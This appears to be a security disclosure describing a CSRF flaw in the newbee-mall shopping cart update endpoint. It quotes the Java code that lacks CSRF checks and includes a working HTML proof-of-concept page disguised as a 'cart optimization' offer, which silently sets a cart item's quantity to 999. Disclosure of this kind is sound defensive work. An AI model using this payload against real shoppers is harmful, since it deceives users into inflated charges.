CSRF Vulnerability in Shopping Cart Item Update

[flashzyc]

CSRF Vulnerability in Shopping Cart Item Update

Summary

A CSRF vulnerability exists in the shopping cart update endpoint /shop-cart (PUT). Attackers can modify the quantity of items in users' shopping carts, potentially increasing order values significantly.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/shop-cart/**");
        // ❌ No CSRF protection
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java (Lines 78-91)

@PutMapping("/shop-cart")
@ResponseBody
public Result updateNewBeeMallShoppingCartItem(@RequestBody NewBeeMallShoppingCartItem newBeeMallShoppingCartItem,
                                               HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    newBeeMallShoppingCartItem.setUserId(user.getUserId());
    // ❌ No CSRF token validation
    // ⚠️ Allows modification of item quantities without authorization
    String updateResult = newBeeMallShoppingCartService.updateNewBeeMallCartItem(newBeeMallShoppingCartItem);
    if (ServiceResultEnum.SUCCESS.getResult().equals(updateResult)) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(updateResult);
}

Security Issues:

1. ❌ No CSRF token validation
2. ⚠️ Can drastically increase item quantities
3. ⚠️ Leads to inflated order values

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Cart Optimization</title>
</head>
<body>
    <h2>🛒 Optimizing your shopping cart...</h2>
    <p>Please wait while we apply discounts.</p>
    
    <script>
        // Increase quantity of all cart items to maximum
        fetch('http://localhost:28089/shop-cart', {
            method: 'PUT',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                cartItemId: 1,      // Target cart item
                goodsCount: 999,    // Set to maximum quantity
                goodsId: 10001
            })
        })
        .then(response => response.json())
        .then(data => {
            document.body.innerHTML = '<h3>✅ Cart optimized!</h3>';
        });
    </script>
</body>
</html>

Impact

Shopping cart manipulation leading to inflated charges - Users may unknowingly checkout with drastically increased item quantities, resulting in unexpected high charges.

---

CVSS Score: 7.1 (High)